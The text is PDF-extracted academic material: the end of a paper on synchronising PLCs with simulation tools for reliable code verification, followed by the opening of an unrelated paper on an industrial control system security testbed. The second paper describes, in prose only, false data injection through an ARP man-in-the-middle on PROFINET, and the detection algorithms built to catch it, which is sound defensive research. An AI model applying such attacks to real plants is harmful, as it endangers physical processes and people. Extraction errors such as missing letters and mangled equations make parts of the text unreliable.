[53], [54], PLCOpen [34] offers a mo- tion control library speci cation based on IEC 61131-3. The PLCOpen Technical Committee 2 Task force motion con- trol has de ned a suite of speci cations that de nes functionblocks for motion control: see Fig. 12 for an example of afunction block that can be used for controlling an axis with a xed velocity. Later speci cations also include coordinated multi axes motion in 3D space. The rst basic speci cation,which was released in 2005, has been implemented in over 30products [34]. If the application that is to be programmed of ine and simu- lated uses the PLC Open motion control function, it is possibleto use a modi ed function block that uses the virtual clock. In the proposed third edition of the IEC 61131-3 standard, there are some new features proposed that might ease the im- plementation of these synchronization functionalities. One pro- Fig. 13. The pre-programmed robot path used in Scenarios 1 and 2. The num- bers represent the run order of the path and represent a 2D location (x, z). posed feature is that it will be possible to call a POU program from another program. VI. C ASESTUDY A. Case Study Setup To demonstrate the proposed time synchronization method and the disadvantages of unreliable simulation, a case study wasset up. A real PLC from Binar [40] was programmed to con- trol a two-dimensional servo controlled robot. The robot was programmed, in IEC 61131-3, to follow the path described inFig. 13. A simulation model was created in a CAPE tool, Process Sim- ulate. The model represents the 3D geometry and kinematics of the robot. Two scenarios were carried out: In Scenario 1, the CAPE tool was connected to the PLC in an unsynchronized way (free-wheeling) provided by CAPE tools today. In Scenario 2, the model was connected according to the synchronization method proposed in this paper. To be able to use Process Simulate with the proposed method an adaption of the software was made. This application reads and writes values to the SDSP server and overrides the internal simulation engine in Process Simulate in order to use thevalues from the SDSP server. To be able to utilize the new timesynchronization method, Scenario 2, the following preparations were carried out in the PLCcode: All tasks in the PLC con guration were set to the same priority and the same cycle time. A scheduler was implemented and added to the con gura- tion. All timers in the con guration were replaced with modi ed timers including virtual time. An execution controller was added to each program. The servo control function blocks were replaced with new ones implying time synchronization. B. Results Two test scenarios were setup: 1) with no time synchroniza- tion and 2) with the time synchronization method proposed here. Several cycles were executed in both scenarios. Fig. 14shows the results from the runs when no time synchronizationwas used, (1). The enlarged part shows the nondeterministic behavior when no time synchronization was employed (com- pared to the preprogrammed desired behavior in Fig. 13). Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. CARLSSON et al. : METHODS FOR RELIABLE SIMULATION-BASED PLC CODE VERIFICATION 275 Fig. 14. Measured robot path without synchronization. Fig. 15. Measured robot path with the new proposed time synchronization method. This nondeterministic unreliable behavior is due to the four problems described earlier. Fig. 15 shows the results when the proposed time synchro- nization method was used (2). The plot clearly shows that the nondeterministic unreliable behavior in Fig. 14 has disappeared. The results show that the suggested reliable time synchroniza-tion is necessary when verifying control code with CAPE tools. The case study was not intentionally designed to show unreli- able behavior, it is an existing industrial application. All fourissues discussed in the previous sections were found in this casestudy. Thus, these issues should not be neglected or considered to be marginal. VII. P ROPOSAL FOR AN EXTENSION OF OPC As shown in this paper, the proposed synchronization mech- anism based on IEC 61131-3 will ful l the requirements to per- form reliable PLC code veri cation. However, a more indus- trially attractive solution would be to embed a synchronizationmechanism into the PLC and simulation tool. To achieve indus- trial acceptance, a solution based on an already accepted stan-dard, such as OPC, is preferable. The OPC Foundation, PLC vendors and CAPE tool vendors could together agree on an extension to the OPC standard anda simulation mode in the PLCs that would make it possible toful ll the requirements for reliable simulation. The authors have identi ed the following requirements for a new standard to be of importance. Compatibility with existing simulation tools and PLC so- lutions. A synchronization mechanism to guarantee a reliable simulation and deterministic results as described inSections IV and V. A synchronized common start, stop and reset functionality for simulation and PLC. Vendor independency. VIII. C ONCLUSION OPC is today established as a de facto standard for connecting PLCs to CAPE tools for veri cation purposes, but in this paperfour major issues of concern regarding its usage are presentedand described in detail namely; jitter, time delay, race condition, and slow sampling. Each of these four issues will indeed result in unreliable results and hazardous effects as shown in the casestudy, e.g., false collision detection, wrong sensor signals, etc.To overcome these issues, two different approaches have been presented in this paper. 1) A new time synchronization method based on IEC 61131-3 together with simulation architecture. Such a method andarchitecture can be used for reliable veri cation and the development of PLC code with CAPE tools. The proposed synchronization method, together with the architecture,has been demonstrated to work on PLCs that are com-patible with the IEC 61131-3 standard. For industrial usefulness, the synchronization part can be automatically generated and attached for general IEC 61131-3 languagesbefore the downloading of the control logic to the PLC. 2) An idea to an extension of the already existing OPC stan- dard is also formulated. Both approaches have been tested on real PLCs as well as soft PLCs with successful results. The concept has also been veri edby a formal model, implemented in NuSMV [11]. The four is- sues mentioned with free-wheeling were solved with both these synchronization methods. In a long-term perspective a standard-ized OPC-based solution (2) is the most attractive one. A furtheradvantage of the presented approach is that it does not con ict with real-time capabilities of the target application. Thus, it is possible to combine the proposed time synchronization methodwith existing PLC scan cycle time watchdogs (a check if speci- ed real-time limits are exceeded). From an industrial point-of-view, a time synchronization method is necessary when verifying PLC control code. How-ever, industrial state-of-the-art veri cation methods based onCAPE lack this type of feature. To be able to take the next step in the eld of PLC code programming, veri cation and optimization with the aid of simulation tools, a general vendor Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. 276 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012 independent standard that deals with the issues identi ed in this paper is needed. APPENDIX The following section shows the NuSMV [11] model of the server-client concept described in Section IV. The formal veri - cation based on this model shows, among other things, that theclients follow each other synchronously when the time delaysare equal for each client, indicating that the concept works. MODULE client (serverstate, previousserverstate, tv) V AR state : {start, setup, ready, read, run, write}; previous_state : {start, setup, ready, read, run, write};readysignal : {false, true}; tdelay : 0..5; ASSIGN init (state) := start;init (readysignal) := false; init (tdelay) := 0; next (state) := case serverstate = initial_write & tdelay=0 : setup;serverstate = pre_read & tdelay=0 : ready; serverstate = read & tdelay=0 : read; serverstate = pre_write & tdelay=0 : run;serverstate = write & tdelay=0 : write; serverstate = pre_read & tdelay=0 : ready; TRUE : state; esac; next (previous_state) :=state; next (readysignal) := case state!=previous_state : false; (readysignal=false & tdelay=0) : {false, true}; TRUE : readysignal; esac;next (tdelay) := case tdelay=0 : {0..5}; (previousserverstate=pre_read & serverstate=read) : tdelay - 1; TRUE : tdelay; esac; MODULE server (sync)VA R state : {start, initial_write, pre_read, read, pre_write, write}; previous_state : {start, initial_write, pre_read, read, pre_write, write}; tv: 0..1000; ASSIGN init (state) := start;init (tv) := 0; next (state) := case (state = start) : initial_write;(sync & state = initial_write) : pre_read;(sync & state = pre_read) : read; (sync & state = read) : pre_write; (sync & state = pre_write) : write;(sync & state = write) : pre_read;TRUE : state; esac; next (previous_state):=state;next (tv):= case tv=1000 : 0;(previous_state=pre_read & state=read) : tv+1; TRUE : tv; esac;MODULE mainVA R simulationserver: server((client1.readysignal=true | client1.tdelay!=0) & (client2.readysignal=true | client2.tdelay!=0)); client1: client (simulationserver.state, simulationserver.previous_state, simulationserver.tv); client2: client (simulationserver.state, simulationserver.previous_state, simulationserver.tv); Client 1 follows client 2, valid when the time delays for the different clients are equal. SPEC AG (client1.state=client2.state) Liveness test (no deadlock)SPEC AG EF (simulationserver.state=write) Speci c orderSPEC AG (simulationserver.state=read /33E [simulationserver.state=read Usimulationserver.state=pre_write]) REFERENCES [1] Y. Itoh, M. Fukagawa, T. Nagao, T. Mizuya, I. Miyazawa, and T. Sekiguchi, Evaluation of execution time in programmable controller, inProc. IEEE Symp. Emerging Technol. Factory Autom., ETFA , 1999, pp. 1373 1379. [2] J. Bathelt and J. Meile, Computer aided methods supporting concur- rent engineering when designing mechatronic systems controlled by aPLC, in Proc. ICMA 07 , Singapore, 2007. [3] M. Pellicciari, A. Andrisano, F. Leali, and A. Vergnano, Engineering method for adaptive manufacturing systems design, Int. J. Interactive Design Manuf. , vol. 3, pp. 81 91, 2009. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. CARLSSON et al. : METHODS FOR RELIABLE SIMULATION-BASED PLC CODE VERIFICATION 277 [4] K. Thramboulidis, Model-integrated mechatronics Toward a new paradigm in the development of manufacturing systems, IEEE Trans. Ind. Informat. , vol. 1, no. 1, pp. 54 61, Feb. 2005. [5] P. Hoffman, T. M. A. Maksoud, R. Schuman, and G. C. Premier, Vir- tual commissioning of manufacturing systems a review and new ap-proaches for simpli cation, in Pro. 24th Eur. Conf. Modeling and Sim- ulation , 2010. [6] R. Drath, P. Weber, and N. Mauser, An evolutionary approach for the industrial introduction of virtual commissioning, in Proc. IEEE Int. Conf. Emerging Technol. Factory Autom. , 2008, pp. 5 8. [7] D. Thapa, P. Chang Mok, S. Dangol, and W. Gi-Nam, III-phase veri - cation and validation of IEC standard programmable logic controller, inComput. Intell. Modeling, Control Autom., Int. Conf. Intelligent Agents, Web Technol. Internet Commerce , 2006, pp. 111 111. [8] G. Reinhart and G. W nsch, Economic application of virtual com- missioning to mechatronic production systems, Prod. Eng. , vol. 1, pp. 371 379, 2007. [9] M. F. Zaeh, C. Poernbacher, and J. Milberg, A model-based method to develop PLC software for machine tools, CIRP Ann. Manuf. Technol. , vol. 54, pp. 371 374, 2005. [10] R. Bernhardt, A. Sabov, and C. Willnow, Virtual automation system standards, in Proc. IFAC Cost Oriented Autom. , Gatineau/Ottawa, Canada, 2004, pp. 43 48. [11] NuSMV , Jun. 10, 2011. [Online]. Available: http://nusmv.fbk.eu [12] P. Klingstam and P. Gullander, Overview of simulation tools for computer-aided production engineering, Comput. Ind. , vol. 38, pp. 173 186, 1999. [13] H. C. Ng, An integrated design, simulation and programming environ- ment for modular manufacturing machine systems, in Mechatronics Research Group Faculty of Computing Sciences and Engineering DeMontfort University , United Kingdom, 2003. [14] S. Cho, A distributed time-driven simulation method for enabling real- time manufacturing shop oor control, Comput. Ind. Eng. , vol. 49, pp. 572 590, 2005. [15] R. P. J. Q. Ma and R. Lipset, Distributed manufacturing simulation environment, in Proc. Summer Computer Simulation Conf. , 2001. [16] S. C. Park, C. M. Park, G. N. Wang, J. Kwak, and S. Yeo, PLCStudio: Simulation based PLC code veri cation, in Proc. Winter Simulation Conf. , 2008, pp. 222 228. [17] J. Ledin , Simulation Engineering, Build Better Embedded Systems Faster . Lawrence, KS: CMP Books, 2001, . [18] S. Kain, F. Schiller, and S. Dominka, Reuse of models in the lifecycle of production plants using HiL simulation models for diagnosis, inProc. IEEE Int. Symp. Ind. Electron. , 2008, pp. 1802 1807. [19] D. Maclay, Simulation gets into the loop, IEE Review , vol. 43, pp. 109 112, 1997. [20] E. Freund, A. Hypki, R. Bauer, and D. H. Pensky, Real-time cou- pling of the 3D workcell simulation system COSIMIR [registeredtrademark] . Bathurst, Australia, pp. 645 650, 2002. [21] H. Schludermann, T. Kirchmair, and M. V orderwinkler, Soft-com- missioning: Hardware-in-the-loop-based veri cation of controller soft-ware, in Proc. Winter Simulation Conf. , Orlando, FL, 2000, vol. 1, pp. 893 899. [22] R. Bernhardt, G. Schreck, and C. Willnow, Realistic robot simula- tion, Comput. Control Eng. J. , vol. 6, pp. 174 176, 1995. [23] R. Bernhardt, G. Schreck, and C. Willnow, The virtual robot controller interface, in ISATA Autom. Transp. Technol. Simulation and Virtual Reality , Dublin, Ireland, 2000. [24] R. Bernhardt, G. Schreck, and C. Willnow, Development of virtual robot controllers and future trends, in Proc. 6th IFAC Symp. Cost Ori- ented Autom. , Berlin, Germany, 2001, pp. 209 214. [25] M. H. Schwarz and J. Boercsoek, A survey on OLE for process control (OPC), in Proc. 7th Conf. Int. Conf. Appl. Comput. Sci. , Venice, Italy, 2007, vol. 7, pp. 192 196. [26] OPC Foundation [Online]. Available: http://www.opcfoundation.org, 2010-10-01 [27] X. Hong and W. Jianhua, Using standard components in automation industry: A study on OPC speci cation, Comput. Standards Inter- faces , vol. 28, pp. 386 395, 2006. [28] OPC Foundation, Data Access Custom Interface Standard, ver. 3.00, 2003. [29] MatrikonOPC, Oct. 1, 2010. [Online]. Available: www.ma- trikonopc.com [30] F. Iwanitz, XML-DA opens windows beyond the rewall, in Online Industrial Ethernet Book . Titch eld, Hampshire, U.K.: GGH Mar- keting Commununications, 2004. [31] S. Cavalieri and G. Cutuli, Performance evaluation of OPC UA, in Proc. IEEE Conf. Emerging Technol. Factory Autom. , 2010, pp. 1 8. [32] W. Mahnke, S.-H. Leitner, and M. Damm , OPC Uni ed Architec- ture. Berlin, Germany: Springer, 2009. [33] R. Kondor, OPC, XML,. NET and real-time application, Matrikon Inc., 2007. [34] PLCOpen, Oct. 1, 2010. [Online]. Available: http://www.plcopen.org[35] OMG, Oct. 1, 2010. [Online]. Available: http://www.omg.org [36] Object Management Group (OMG), Data acquisition from industrial systems speci cation, ver. 1.1, 2005. [37] V. F. Wolfe, L. C. DiPippo, R. Ginis, M. Squadrito, S. Wohlevera, I. Zykh, and R. Johnston, Real-time CORBA, Proc. Real-Time Technol. Appl. , pp. 148 157, 1997. [38] I. McGregor, The relationship between simulation and emulation, in Proc. Winter Simulation Conf. , San Diego, CA, 2002, pp. 1683 1688. [39] CoDeSys, Oct. 1, 2010. [Online]. Available: http://www.3s-soft- ware.com [40] Binar AB, Oct. 1, 2010. [Online]. Available: http://www.binar.se[41] Integration Objects, Jul. 4, 2010. [Online]. Available: http://www. integ-objects.com [42] F. Xiang, Towards real-time enabled microsoft windows, in Proc. 5th ACM Int. Conf. Embedded Softw. , 2005, pp. 142 146. [43] F. M. Proctor and W. P. Shackleford, Real-time operating system timing jitter and its impact on motor control, in Proc. SPIE-Int. Soc. Opt. Eng. , 2001, vol. 4563, pp. 10 16. [44] B. Lincoln and A. Cervin, Jitterbug: A tool for analysis of real-time control performance, in Proc. IEEE Conf. Decision Control , 2002, pp. 1319 1324. [45] D. Chen, A. Mok, and M. Nixon, Real-time support in COM, in Proc. 32nd Annu. Hawaii Int. Conf. Syst. Sci. , 1999, p. 87. [46] M. Fabian and A. Hellgren, PLC-based implementation of supervi- sory control for discrete event systems, in Proc. IEEE Conf. Decision Control , 1998, vol. 3, pp. 3305 3310. [47] F. Danielsson, A distributed system architecture for optimizing con- trol logic in complex manufacturing systems, in Proc. ISCA 12th Int. Conf. , Atlanta, GA, 1999, pp. 163 167. [48] B. Svensson, D. Danielsson, and B. Lennartson, A virtual real-time model for control software development Applied on a sheet-metalpress line, in Proc. 3rd Int. Ind. Simulation Conf. , Berlin, Germany, 2005, pp. 119 123. [49] T. LeBaron and K. Thompson, Emulation of a material delivery system, in Proc. Winter Simulation Conf., Part 2 (of 2) , Washington, DC, 1998, pp. 1055 1060. [50] Programmable Controller Part 3: Programming Languages , IEC 61131-3, 2003, 2nd ed.. [51] R. W. Lewis, Programming Industrial Control Systems Using IEC 1131-3 Revised edition. London, Institution of Electrical Engineers,1998. [52] A. Hellgren, M. Fabian, and B. Lennartson, On the execution of se- quential function charts, Control Engineering Practice , vol. 13, pp. 1283 1293, 2005. [53] J. Proenza and S. Vitturi, Guest editorial special section on industrial communication systems, IEEE Trans. Ind. Informat. , vol. 6, no. 3, pp. 365 368, Aug. 2010. [54] F. Benzi, G. S. Buja, and M. Felser, Communication architectures for electrical drives, IEEE Trans. Ind. Informat. , vol. 1, no. 1, pp. 47 53, Feb. 2005. Henrik Carlsson was born in Falkenberg, Sweden, in 1979. He received the M.S. degree in robotics from University West, Trollh ttan, Sweden, in 2005. Cur- rently, he is working towards the Ph.D. degree at Uni-versity West. He is working as a Simulation Expert at V olvo Cars Corporation, Gothenburg, Sweden. His main areas of interest include virtual commissioning, robot simula- tion, and PLM systems. Bo Svensson was born in Mariestad, Sweden, in 1959. He received the M.S. degree in electrical en- gineering from Chalmers University of Technology, Gothenburg, Sweden, in 1984. Currently, he is working towards the Ph.D. degree in automation at Chalmers University of Technology, and received the Lic.Eng. degree in 2010. He was a Design Engineer with SAAB Space AB from 1984 to 1987. From 1987 to 1994, he has been with SAAB Automobile AB as a System Engineer.Since 1994, he has been with the Department of En- gineering Science, University West, Trollh ttan, Sweden, as a Researcher. His main research interests include simulation-based optimization and virtual com- missioning of complex manufacturing applications. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply. 278 IEEE TRANSACTIONS ON INDUSTRIAL INFORMATICS, VOL. 8, NO. 2, MAY 2012 Fredrik Danielsson was born in Orust, Sweden, in 1972 . He received the Ph.D. degree in mechatronics from De Montfort University, Leicester, U.K., in 2002. Since 2003, he has been the Head of the Robot Ed- ucation at advanced level. Since 2004, he has beenHead of the Automation Research Group at the De- partment of Engineering Science, University West. His main research interests include exible automa- tion, virtual commissioning, and robot systems. Bengt Lennartson (M 10) was born in Gnosj , Sweden, in 1956. He received the Ph.D. degree in automatic control from Chalmers University of Technology, Gothenburg, Sweden, in 1986. Since 1999, he has been a Professor of the Chair of Automation, Department of Signals and Systems.He was Dean of Education at Chalmers University of Technology from 2004 to 2007, and since 2005, he is a Guest Professor at University West, Trollh ttan. He is (co)author of two books and /24180 peer reviewed international papers with /622200 citations (GS). His main areas of interest include discrete event and hybrid systems, especially for manufacturing applications, as well as robust feedback control. Prof. Lennartson was the Chairman of the Ninth International Workshop on Discrete Event Systems, WODES 08, Associate Editor for Automatica , and cur- rently he is a member of the Advisory Board for the IEEE T RANSACTION ON AUTOMATION SCIENCE AND ENGINEERING . Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:40 UTC from IEEE Xplore. Restrictions apply.
A_Cyber-Security_Methodology_for_a_Cyber-Physical_Industrial_Control_System_Testbed.pdf
Due to recent increase in deployment of Cyber-Physical Industrial Control Systems in different critical infrastructures, addressing cyber-security challenges of these systems is vital for assuring their reliability and secure operation in presence of malicious cyber attacks. Towards this end, developing a testbed to generate real-time data-sets for critical infrastructure that would be utilized for validation of real-time attack detection algorithms are indeed highly needed. This paper investigates and proposes the design and implementation of a cyber-physical industrial control system testbed where the Tennessee Eastman process is simulated in real-time on a PC and the closed-loop controllers are implemented on the Siemens PLCs. False data injection cyber attacks are injected to the developed testbed through the man-in-the-middle structure where the malicious hackers can in real-time modify the sensor measurements that are sent to the PLCs. Furthermore, various cyber attack detection algorithms are developed and implemented in real-time on the testbed and their performance and capabilities are compared and evaluated.
Received January 6, 2021, accepted January 15, 2021, date of publication January 20, 2021, date of current version January 28, 2021. Digital Object Identifier 10.1 109/ACCESS.2021.3053135 A Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed MOHAMMAD NOORIZADEH 1, MOHAMMAD SHAKERPOUR 2, NADER MESKIN 1, (Senior Member, IEEE), DEVRIM UNAL 2, (Senior Member, IEEE), AND KHASHAYAR KHORASANI 3, (Member, IEEE) 1Department of Electrical Engineering, Qatar University, Doha, Qatar 2KINDI Center for Computing Research, Qatar University, Doha, Qatar 3Department of Electrical and Computer Engineering, Concordia University, Montreal, QC H3G 1M8, Canada Corresponding author: Nader Meskin ([email protected]) This work was supported by the Qatar National Research Fund (a member of the Qatar Foundation) through the National Priorities Research Program (NPRP) under Grant 10-0105-17017. The work of Nader Meskin and Khashayar Khorasani were supported by the North Atlantic Treaty Organization (NATO) through the Emerging Security Challenges Division Program. INDEX TERMS Industrial control systems, cyber attack, attack detection algorithm, man-in-the-middle attack, hybrid testbed. I. INTRODUCTION Recent technological advances in control, computing, and communications have generated intense interest in develop- ment of new generation of highly interconnected and sen- sor rich systems that is known as critical Cyber-Physical Systems (CPS) infrastructure with application to variety of engineering domains such as process and automation systems, smart grid and smart cities, and healthcare sys- tems. These complex systems are becoming more distributed and computer networked that have necessitated the devel- opment of novel monitoring, diagnostics, and distributed control technologies. Supervisory Control And Data Acqui- sition (SCADA) systems, Wireless Sensor Networks (WSN), The associate editor coordinating the review of this manuscript and approving it for publication was Wentao Fan .and PLCs, are now established paradigms that are utilized in many critical CPS infrastructure. On the other hand, the envisaged complex CPS infrastruc- ture do more than ever require development of novel and proactive security technologies, as these systems are con- tinuously being targeted by cyber attacks and intrusions by intelligent malicious adversaries. The adversaries are capable of attacking core control systems that are employed in all key cyber-physical systems infrastructure. These scenarios do not exist and are not possible or similar to security challenges that are present in traditional IT systems. Therefore, there exists an urgent need to study the vulnerabilities, analyze the risks, and develop defensive and mitigation mechanisms for critical CPS infrastructure. Due to sensitivity and high importance of the safety critical systems in real life, any research activity that is directly applied to the physical infrastructure can lead to disruption, VOLUME 9, 2021This work is licensed under a Creative Commons Attribution 4.0 License. For more information, see https://creativecommons.org/licenses/by/4.0/16239 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed unexpected damages or losses, and hence development of testbeds that mimic behavior of CPS in a small-scale fashion is highly essential for development of various cyber-security technologies. In this paper, a hybrid cyber-physical testbed for industrial control systems is developed and various types of real cyber attack scenarios are injected and imple- mented. Moreover, online real-time cyber attack detection algorithms are proposed to provide a comprehensive solu- tion to the cyber-security of cyber-physical industrial control systems (ICS). ICS testbeds generally consist of two main components, namely the physical process and the eld devices such as PLC, HMI, RTU, etc. Depending on implementation meth- ods, ICS testbeds are classi ed into three main categories as follows [1]: I) simulation testbed in which both components of the ICS are solely based on computer simulation [2], II) physical testbed where real physical parts are used in both components [3], and III) hybrid testbed in which a combination of simulation and physical testbed is considered where some components of the testbed such as the physical process is simulated and the rest are based on actual physical parts [4], [5]. In this paper, the hybrid testbed architecture is selected for development of the ICS testbed, where the Tennessee Eastman (TE) plant is simulated inside a PC and the remain- ing parts are implemented using actual industrial hardware. The TE plant is selected as the industrial process for our developed cyber-security testbed due to the following rea- sons. First, the TE model is a well-known chemical process that is used in control systems research and its dynamics are well-understood. Second, it should be properly controlled otherwise small disturbances will drive the system towards an unsafe and unstable operation. The inherent unstable open-loop property of the TE process presents a real-world scenario in which a cyber attack could correspond to a real risk to human safety, environmental safety, and economic viability. Third, the TE process is complex, coupled and highly nonlinear, and has many degrees of freedom by which to control and perturb the dynamics of the process. Finally, various simulations of the TE process have been developed with readily available reusable code design by Ricker [6]. Finally, from the anomaly detection perspectives, the cyber attack detection algorithms can be divided into ve main cate- gories, namely: linear, proximity-based, probabilistic, outlier ensembles, and neural networks approaches [7]. Therefore, in order to have a comprehensive comparison for cyber attack detection approaches that t the TE process, the following algorithms have been chosen from various categories such as: Principal Component Analysis (PCA), One-Class Sup- port Vector Machines (OCSVM), Local Outlier Factor (LOF) k-Nearest-Neighbors (kNN), and Isolation Forest (IF). Com- parative studies are conducted based on the cyber attack detection time and the confusion matrix performance metrics where subsequently, the OCSVM and kNN are demonstrated to yield promising performance for accomplishing the cyber attack detection objective.A. BACKGROUND Cyber attacks on TE processes are also investigated in the literature. In [8], an integrity attack is injected on the manipulated variable signals and the corresponding sen- sor measurements are observed by correlation-based clus- tering algorithm. Different studies have been conducted on nding the optimal time to launch the Denial of Service (DoS) attack on either the sensor or actuator sig- nals in the TE process [9][11]. Several cyber attack detec- tion methods such as model-based approaches [12], [13], clustering-based approaches [14], Gaussian mixture mod- els [15], and RNN-based approaches [16] are developed for detection of different cyber attacks on the TE process. How- ever, all of the above work are based on the simulated TE process and cyber attacks are mainly emulated inside the simulation le. Furthermore, several recent ICS testbeds for investigating cyber security are developed in the literature and Table 1 presents comparisons among these testbeds for diverse range of applications that are based on TYPE (simulation (S), physical (P), real ICS (R), and hybrid (H)), Process, Data Type (network data (NET) and process data (PR)), Detection Method, Attacks, Attack Type (emulation (E) and physi- cal (P)). As shown in this table, in [17][25] cyber-physical testbeds are developed for the physical water system and different case studies in terms of data type, communica- tion and attack injection/detection are presented. In [17], a model-based detection approach is developed to detect three different attacks by using network data. Also, a physics- based detection approach is presented in [18] in order to detect stealthy vulnerability by using the process data. In [19], an Intrusion Detection System (IDS) approach is devel- oped to detect four various attacks by using network data. In [20], different data-driven intrusion detection algorithms are developed using the network data from the Modbus com- munication protocol. In [21][25], water system testbeds are developed based on the Ethernet/IP as the communication protocol. A power system testbed is designed and implemented in [26][28]. A simulation testbed is used in [26] and in [27] a physical testbed is developed and different attack detection algorithms are developed by using both the network and the process data. In [29], [30], a simpli ed version of the Tennessee Eastman process is utilized as the physical plant in the testbed and model-based attack detection algorithms are proposed for the simulation-based testbeds without con- sidering any physical hardware in the simulator. B. CONTRIBUTIONS In this paper, a full version of the nonlinear chemical process of the Tennessee Eastman process is used as the physical process in the developed hybrid testbed. Moreover, based on the structure and features of PROFINET as the industrial eld bus that is used in the Siemens distributed I/O, the actual real-time false data injection cyber attack is implemented 16240 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed TABLE 1. Overview of the existing testbeds for cyber-security study. through the man-in-the-middle (MITM) architecture on the developed testbed. This is achieved by utilizing Address Resolution Protocol such that the cyber hacker acts as the MITM in the closed-loop system and modi es the sensor measurements sent to the PLC or the actuator commands that are sent to the distributed I/O. Furthermore, various real-time online cyber attack detection algorithms are developed and implemented on the testbed and their performance capabili- ties are compared and evaluated. Consequently, this is the rst work in the literature that completely simulates a full-version of the Tennessee Eastman Process using a hybrid testbed. In other words, this work provides a comprehensive solution for the cyber-security of ICS enabled with the following main contributionsV 1) A hybrid testbed is developed by using the simulated full-version of the Tennessee Eastman Process as a non- linear unstable process and the Siemens eld devices such as PLC and distributed I/O, whereas the previous work in [29], [30] only considered the simpli ed ver- sion of TE without having anyactual hardware in the testbed. 2) Real-time false data injection cyber attacks are imple- mented by compromising the PROFINET eld-bus protocol for the rst time in the literature, where as shown in Table 1, all of the previous works are basedon either the Modbus or the Ethernet communication protocols. 3) Several online cyber attack detection methodologies such as PCA, OCSVM, LOF, KNN, and IF are devel- oped and implemented for real-time detection of cyber attacks in the supervisory level of the testbed. In con- trast, in most of the previous work in the literature the detection algorithms are implemented off-line after collecting the data from the testbed. The remainder of this paper is organized as follows. In Section II, the developed hybrid ICS testbed is presented. Section III provides details on PROFINET eld bus protocol that is used in the testbed and in Section IV, the implemen- tation of false data injection cyber attack is described and introduced. Section Vpresents the proposed cyber attack detection methodologies and in Section VItheir per- formances are quantitatively demonstrated, validated, and veri ed subject to various cyber attack scenarios. Finally, in Section VII, conclusions and future work are provided. II. HYBRID ICS TESTBED The cyber-physical ICS includes three main components namely, a physical plant to be controlled, an embedded system for implementing the controller, and a communica- tion network for exchanging the information between the VOLUME 9, 2021 16241 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed controller and the plant. In the developed testbed, these components are all considered where the plant is simulated inside a PC, the controller is implemented on an actual hard- ware (PLCs) and nally the communication is established by using the industrial protocol namely, PROFINET. As shown in Fig. 1, the developed testbed is partitioned into four layers: (1) the Tennessee Eastman plant that is simulated by a PC, (2) the eld devices that are emulated by using DAQ and the Siemens distributed I/O, (3) the control layer implementation using the Siemens PLCs, and (4) the supervisory layer using additional Siemens PLC and web- server. Moreover, the mathematical model of the TE process is implemented and simulated in Matlab/Simulink environ- ment and the controllers are implemented by using the PLCs. The interface between the plant simulation and the PLCs is accomplished by using the DAQ boards and the distributed I/O modules. The DAQ boards generate voltages that are proportional to various plant variables and also acquire the input voltages as the actuator command signals from the controller. Hence, by using the DAQs, different sensors and actuators inside the plant are emulated in the testbed. The distributed I/O modules provide the interface between the plant sensors/actuators and the PLCs. Consequently, the DAQ boards and the distributed I/O modules emulate the layer 1 within the industrial automation hierarchy, namely the eld layer. FIGURE 1. The developed hybrid ICS testbed. A. TENNESSEE EASTMAN (TE) PROCESS SIMULATION The TE process is rst described by Down and Vogel in 1993 [6], [31] and is modeled through fty (50) nonlinear and coupled differential equations [32]. It consists of ve major operational units, namely: (1) chemical reactor, (2) product condenser, (3) recycle compressor, (4) vapor-liquid separator, and (5) product stripper. Two liquid products (G, H) are produced by using A,C,D, and Egaseous reactants with BandFas inert and byproduct, respectively. The chemical reactions are irreversible and can be presented as followsV A(g)CC(g)CD(g)!G(l);Product 1; A(g)CC(g)CE(g)!H(l);Product 2;A(g)CE(g)!F(l);Byproduct; 3D(g)!2F(l);Byproduct: The TE process is a nonlinear open-loop unstable process which reaches its shutdown constraints in less than 2 hours. Accordingly, a controller is required to maintain the system in the steady state and the process variables at desired values, and to enforce hard constraints on the process variables such as the reactor pressure, the reactor level, the reactor tempera- ture, among others [31], [33]. The TE process has 12 manipulated variables (XMVs), 41 measured variables (XMEAS), and 20 different process disturbances (IDVs) which can be chosen by the user [6]. The output measurements (XMEAS) of the plant are divided into 22 continuous-time and 19 discrete-time measure- ments. In the developed testbed in this work, only 9 inputs and 16 continuous-time outputs are used as speci ed in Tables 2and3, respectively. It should be noted that the time unit of the original TE process model was in hours which is not suitable for a real-time simulation. Thus, in order to make the process real-time, the model is modi ed accordingly by changing the state dynamics of the system and correspond- ingly the controller gains. TABLE 2. Manipulated variables used in the testbed. TABLE 3. Process measurements used in the testbed. B. FIELD DEVICE AND CONTROL LAYERS In the developed ICS testbed, the Siemens S7-1200 PLC CPU and the SIMATIC EP 200SP distributed I/O modules are 16242 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed used. For establishing the interface between the simulated process on the PC, and PLCs and distributed modules, MF644 and MF634 DAQ boards are used mainly due to a high number of analog inputs/outputs and their compatibility with MATLAB/Simulink. Each I/O module contains 4 analog inputs and 2 analog outputs and in order to connect all PLCs with all I/Os, the Siemens CSM 1277 switch modules are used. As shown in Fig. 1, DAQ boards convert sensor measure- ments from the TE process (implemented by a PC) to analog signals and feed them to the distributed I/O modules. At the same time, DAQ boards receive the actuator signals from the distributed I/Os and feed them back to the TE process that is simulated by Simulink. All communications between the distributed I/O modules and PLCs are based on the PROFINET protocol which is an Open Real-time Industrial Ethernet Standard Protocol which can be used for virtually any function that is required in automation, namely: discrete, process, motion, peer-to-peer integration, vertical integration, and safety, among others. As shown in Table 4, the closed-loop controller scheme for the testbed contains 9 main Proportional-Integral (PI) controllers on ve PLCs that are regulating the ow rate of each valve and the 8 internal PI loops for generating the internal set-points and variables that are needed in the 